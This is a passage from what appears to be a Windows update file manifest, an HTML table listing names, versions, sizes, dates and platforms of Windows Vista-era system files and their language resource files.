applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>13,312</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>87,040</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>126,976</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>13,312</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>89,600</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>35,840</td><td>28-Apr-2018</td><td>04:01</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll</td><td>6.0.6002.24367</td><td>620,544</td><td>28-Apr-2018</td><td>01:53</td><td>x64</td><td>Not applicable</td></tr><tr><td>Auditpol.exe</td><td>6.0.6002.24367</td><td>53,760</td><td>28-Apr-2018</td><td>01:58</td><td>x64</td><td>Not applicable</td></tr><tr><td>Msaudite.dll</td><td>6.0.6002.24367</td><td>146,432</td><td>28-Apr-2018</td><td>02:28</td><td>x64</td><td>Not applicable</td></tr><tr><td>Msobjs.dll</td><td>6.0.6002.24367</td><td>58,880</td><td>28-Apr-2018</td><td>02:28</td><td>x64</td><td>Not applicable</td></tr><tr><td>Ntdll.dll</td><td>6.0.6002.24367</td><td>1,583,448</td><td>28-Apr-2018</td><td>02:33</td><td>x64</td><td>Not applicable</td></tr><tr><td>Oleaut32.dll</td><td>6.0.6002.24367</td><td>862,720</td><td>28-Apr-2018</td><td>02:28</td><td>x64</td><td>Not applicable</td></tr><tr><td>Ntoskrnl.exe</td><td>6.0.6002.24367</td><td>4,718,272</td><td>28-Apr-2018</td><td>02:50</td><td>x64</td><td>Not applicable</td></tr><tr><td>Rpcrt4.dll</td><td>6.0.6002.24367</td><td>1,308,160</td><td>28-Apr-2018</td><td>02:28</td><td>x64</td><td>Not applicable</td></tr><tr><td>Spsys.sys</td><td>6.0.6002.24298</td><td>354,816</td><td>23-Feb-2018</td><td>03:26</td><td>x64</td><td>Not applicable</td></tr><tr><td>Smss.exe</td><td>6.0.6002.24367</td><td>76,288</td><td>28-Apr-2018</td><td>01:54</td><td>x64</td><td>Not applicable</td></tr><tr><td>Ntvdm64.dll</td><td>6.0.6002.24367</td><td>16,896</td><td>28-Apr-2018</td><td>02:28</td><td>x64</td><td>AMD64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Wow64.dll</td><td>6.0.6002.24367</td><td>234,496</td><td>28-Apr-2018</td><td>02:28</td><td>x64</td><td>AMD64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Wow64cpu.dll</td><td>6.0.6002.24367</td><td>17,408</td><td>28-Apr-2018</td><td>02:28</td><td>x64</td><td>AMD64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Wow64win.dll</td><td>6.0.6002.24367</td><td>301,568</td><td>28-Apr-2018</td><td>02:28</td><td>x64</td><td>AMD64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Comcat.dll</td><td>6.0.6002.24367</td><td>7,168</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Oleres.dll</td><td>6.0.6002.24367</td><td>23,552</td><td>28-Apr-2018</td><td>01:44</td><td>x86</td><td>Not applicable</td></tr><tr><td>Kernel32.dll</td><td>6.0.6002.24367</td><td>862,720</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Ntdll.dll</td><td>6.0.6002.24367</td><td>1,168,840</td><td>28-Apr-2018</td><td>02:43</td><td>x86</td><td>Not applicable</td></tr><tr><td>Oleaut32.dll</td><td>6.0.6002.24367</td><td>574,464</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Rpcrt4.dll</td><td>6.0.6002.24367</td><td>679,424</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Acwow64.dll</td><td>6.0.6002.24367</td><td>43,520</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>WOW64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Instnm.exe</td><td>6.0.6002.24367</td><td>7,680</td><td>28-Apr-2018</td><td>01:41</td><td>x86</td><td>WOW64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Ntvdm64.dll</td><td>6.0.6002.24367</td><td>14,336</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>WOW64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Setup16.exe</td><td>3.1.0.1918</td><td>26,112</td><td>28-Apr-2018</td><td>01:41</td><td>x86</td><td>WOW64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>User.exe</td><td>6.0.6002.24367</td><td>2,560</td><td>28-Apr-2018</td><td>01:41</td><td>x86</td><td>WOW64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Wow32.dll</td><td>6.0.6002.24367</td><td>5,120</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>WOW64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>380,928</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>389,120</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>385,024</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>385,024</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>401,408</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>266,240</td><td>28-Apr-2018</td><td>02:41</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>393,216</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>385,024</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>393,216</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>376,832</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>393,216</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>389,120</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>360,448</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>360,448</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>385,024</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>389,120</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>393,216</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>389,120</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>389,120</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>393,216</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>385,024</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>385,024</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>356,352</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>348,160</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll</td><td>6.0.6002.24367</td><td>823,808</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Ole32.dll</td><td>6.0.6002.24367</td><td>1,321,472</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>X86_MICROSOFT-WINDOWS-COM-BASE-QFE</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:43</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:42</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:43</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:45</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:43</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>4,096</td><td>28-Apr-2018</td><td>03:41</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:42</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>02:36</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>02:37</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:53</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:42</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:41</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:43</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:53</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>20,480</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:45</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:42</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:43</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:45</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>20,480</td><td>28-Apr-2018</td><td>03:53</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>20,480</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>229,376</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>159,744</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>69,632</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>245,760</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>176,128</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>81,920</td><td>28-Apr-2018</td><td>03:45</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>241,664</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>167,936</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>73,728</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>262,144</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>167,936</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>81,920</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>286,720</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>196,608</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>81,920</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>233,472</td><td>28-Apr-2018</td><td>02:40</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>02:41</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>155,648</td><td>28-Apr-2018</td><td>02:41</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>69,632</td><td>28-Apr-2018</td><td>02:39</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>274,432</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>192,512</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>77,824</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>237,568</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>172,032</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>77,824</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>290,816</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>192,512</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>77,824</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>221,184</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>04:01</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>147,456</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>69,632</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>262,144</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>180,224</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>86,016</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>262,144</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>176,128</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>81,920</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>167,936</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>118,784</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>53,248</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>151,552</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>110,592</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>53,248</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>241,664</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>163,840</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>73,728</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>253,952</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>176,128</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>81,920</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>270,336</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>04:01</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>188,416</td><td>28-Apr-2018</td><td>04:01</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>81,920</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>274,432</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not 